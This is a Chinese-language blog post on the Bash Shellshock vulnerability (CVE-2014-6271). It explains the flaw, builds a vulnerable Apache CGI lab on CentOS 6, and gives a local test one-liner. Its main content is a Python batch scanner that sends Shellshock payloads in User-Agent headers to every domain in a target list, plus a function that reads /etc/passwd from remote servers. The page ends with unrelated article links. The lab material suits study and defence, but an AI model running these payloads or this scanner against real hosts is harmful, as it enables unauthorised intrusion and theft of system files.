0x01 漏洞原理

Bash使用的环境变量是通过函数名称来调用的,导致漏洞出问题是以“(){”开头定义的环境变量在命令ENV中解析成函数后,Bash执行并未退出,而是继续解析并执行shell命令。而其核心的原因在于在输入的过滤中没有严格限制边界,也没有做出合法化的参数判断。

0x2 Bash破壳漏洞测试

2.1 本地测试语句:

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

输出:

vulnerable

this is a test

说明有漏洞,否则就没有。

2.2 漏洞复现:

2.2.1 安装配置:

  • Centos6 Apache2.2 CGI
yum install httpd

service iptables stop

httpd.conf配置



1、576行设置/var/www/cgi-bin目录的脚本别名是cgi-bin,

ScriptAlias /cgi-bin/ "/var/www/cgi-bin/"

让这个目录下都支持cgi

2、582行修改Options

<Directory "/var/www/cgi-bin">

    AllowOverride None

    Options ExecCGI

    Order allow,deny

    Allow from all

</Directory>

3、796行添加访问后缀,当其被访问能被解析

AddHandler cgi-script .cgi .pl .sh

4、200行需要有cgi模块

LoadModule cgi_module modules/mod_cgi.so

POC.cgi放置到cgi-bin,具体内容如下:

#!/bin/bash

echo "Content-type: text/html"

echo ""

echo '<html>'

echo '<head>'

echo '<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">'

echo '<title>PoC</title>'

echo '</head>'

echo '<body>'

echo '<pre>'

/usr/bin/env

echo '</pre>'

echo '</body>'

echo '</html>'

2.2.1 Bash配置:

下载Bash之后,因为apache默认调用的是/bin/bash,没有漏洞。所以要通过软链接调用存在漏洞的Bash

$ wget http://labfile.oss.aliyuncs.com/bash-4.1.tar.gz

$ tar xf bash-4.1.tar.gz

$ cd bash-4.1

$ ./configure

$ make & make install

$ ln -s /usr/local/bin/bash /bin/bash

2.2 批量测试

# -*- coding:utf8 -*-

import urllib.parse

import urllib.request

import ssl

import re

import sys

from socket import timeout

import http.client    #修改引用的模块

import os

domain_list = []

result = []

#读取文件函数

def read_file(file_path):

    # 判断文件路径是否存在,如果不存在直接退出,否则读取文件内容

    if not os.path.exists(file_path):

        print('Please confirm correct filepath ! ')

        sys.exit(0)

    else:

        with open(file_path, 'r') as source:

            for line in source:

                domain_list.append(line.rstrip('\r\n').rstrip('\n'))

def bash_exp(url):

    hostname, urlpath = urllib.parse.urlsplit(url)[1:3]

    try:

        conn = http.client.HTTPConnection(hostname, timeout=20)

        headers = {"User-Agent": '() { :;}; echo vulnerable /bin/bash -c "echo this is a test"'}

        conn.request("GET", urlpath, headers=headers)

        res = conn.getresponse()

        if res and res.status == 500:

            print("{host} : discover Vulnerable! ".format(host=hostname))

            result.append(hostname)

        else:

            print("{host} :No Bash Vulnerable! ".format(host=hostname))

    #except Exception, e:

    except Exception as e:

        print("{host} is {err}".format(host=hostname,err=e))

def cat_passwd(hostname, urlpath):

    print("cat /etc/passwd :")

    conn3 = http.client.HTTPConnection(hostname, timeout=20)

    headers3 = {"User-Agent": "() { :;}; echo `/bin/cat /etc/passwd`"}

    conn3.request("GET", urlpath, headers=headers3)

    res3 = conn3.getresponse()

    res = res3.getheaders()

    for passwdstr in res:

        print(passwdstr[0] + ':' + passwdstr[1])

if __name__ == '__main__':

    read_file(os.getcwd()+"//attck.txt")

    for domain in domain_list:

        test_url = ("http://{domain}/cgi-mod/index.cgi").format(domain=domain)

        bash_exp(test_url)

    for ret in result:

        with open("result.txt","a+") as file:

            file.write(ret)

2.3 参考

https://www.linode.com/docs/web-servers/apache/run-php-cgi-apache-centos-6/

https://www.freebuf.com/news/48331.html

https://blog.csdn.net/yaofeino1/article/details/55211993

https://www.cyberciti.biz/faq/how-do-i-check-my-bash-version/

Bash Shellshock(CVE-2014-6271)破壳漏洞测试的更多相关文章

  1. CVE-2014-6271 Shellshock 破壳漏洞 复现

    补坑. 什么是shellshock ShellShock是一个BashShell漏洞(据说不仅仅是Bash,其他shell也可能有这个漏洞). 一般情况来说,系统里面的Shell是有严格的权限控制的, ...

  2. Shellshock 破壳漏洞 Writeup

    破壳漏洞 CVE编号:CVE-2014-6271 题目URL:http://www.whalwl.site:8029/ 提示:flag在服务器根目录 ShellShock (CVE-2014-6271 ...

  3. 破壳漏洞利用payload—shellshock in the wild

    FireEye关于破壳漏洞(shellshock)在现实中的利用有一篇文章: shellshock in the wild 原文较长,进行了对CGI利用的详细分析,笔者比较感兴趣的是Shellshoc ...

  4. 对CVE-2014-6271 [破壳漏洞] 的一次不太深入的跟踪

    @firtst:有些事,该你遇到的始终会遇到!2013年,Struts2远程代码执行漏洞闹的满城风雨时,当时还对此一无所知:2014年4月,HeartBleed掀起波涛汹涌时,较快对此予以关注,晚上跑 ...

  5. Bash ShellShock 解决办法

    2014 年 9 月 24 日,Bash 惊爆严重安全漏洞,编号为 CVE-2014-6271,该漏洞将导致远程攻击者在受影响的系统上执行任意代码.GNU Bash 是一个为 GNU 计划编写的 Un ...

  6. SPF邮件伪造漏洞测试脚本

    测试脚本: # -*- coding: utf-8 -*- import socket,select,base64,os,re,time,datetime class mail: def __init ...

  7. CSRF 漏洞测试

    CSRF简介: CSRF中文名:跨站请求伪造,英文译为:Cross-site request forgery,CSRF攻击就是attacker(攻击者)利用victim(受害者)尚未失效的身份认证信息 ...

  8. kali上部署dvwa漏洞测试平台

    kali上部署dvwa漏洞测试平台 一.获取dvwa安装包并解压 二.赋予dvwa文件夹相应权限 三.配置Mysql数据库 四.启动apache2和mysql服务 五.在网页配置dvwa 六.登陆到D ...

  9. MS14-064 漏洞测试入侵——20145301

    MS14-064 漏洞测试入侵 Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术 执行摘要 此安全更新可解决 Microsof ...

随机推荐

  1. PHP开发中常用的字符串操作函数

    1,拼接字符串 拼接字符串是最常用到的字符串操作之一,在PHP中支持三种方式对字符串进行拼接操作,分别是圆点.分隔符{}操作,还有圆点等号.=来进行操作,圆点等号可以把一个比较长的字符串分解为几行进行 ...

  2. mysql运维相关

    1.为什么要分库分表(设计高并发系统的时候,数据库层面该如何设计)?用过哪些分库分表中间件?不同的分库分表中间件都有什么优点和缺点?2.现在有一个未分库分表的系统,未来要分库分表,如何设计才可以让系统 ...

  3. MySQL 进阶6: 连接查询 (多表连接) : 等值连接/非等值连接 /左右全连接/内连接

    #进阶6: 连接查询 (多表连接) : 等值连接/非等值连接 /左右全连接/内连接 /* 含义: 当查询的字段来自于多个表时, 就会用到连接查询 一: sql 92标准 :等值连接 ,(#内连接) 1 ...

  4. 第59题:螺旋矩阵 II

    一. 问题描述 给定一个正整数 n,生成一个包含 1 到 n2 所有元素,且元素按顺时针顺序螺旋排列的正方形矩阵. 示例: 输入: 3 输出: [ [ 1, 2, 3 ], [ 8, 9, 4 ], ...

  5. C语言实现的文件交互

    计算机与外部设备的交互依靠文件完成 文件是记录在外部介质上的数据的集合:例如1.c 是源码 1.exe可执行的文件 文件的分类 按组织结构: 记录文件:有一定结构的文件,可以解析成字段值的文件: 流式 ...

  6. ValueError: Expecting property name: line 1 column 2 (char 1)

    代码: import json str2 = '{"domain":"456"}' str1 = "{'domain':'123'}" pr ...

  7. ES6-12.Symbol

    Symbol是ES6新增的原始类型数据,引入的初衷是为了对象可以有永不重复的属性名. 所以属性名可以是字符串外,还可以是Symbol值: const a = Symbol("a") ...

  8. DOS窗口启动tomact,运用startup.bat/shutdown.bat命令启动/关闭tomcat

    设置CATALINA_HOME环境变量1.CATALINA_HOME是TOMCAT安装路径的别名,目的是为了方便使用TOMCAT2.计算机>属性>环境变量, 新建环境变量.变量名为CATA ...

  9. Asia-Jakarata 2018

    目录 Contest Info Solutions Problem A. Edit Distance Problem C. Smart Thief Problem D.Icy Land Problem ...

  10. NOIP考前总结

    最近出的锅比较多啊,我来总结一下吧 $1.$小心文件名/文件输入输出!别打错了!结束前十分钟一定要检查! $2.$开数组前要算好内存,不要开一个$1e8$或$1e4*1e4$这样的大数组,直接GG $ ...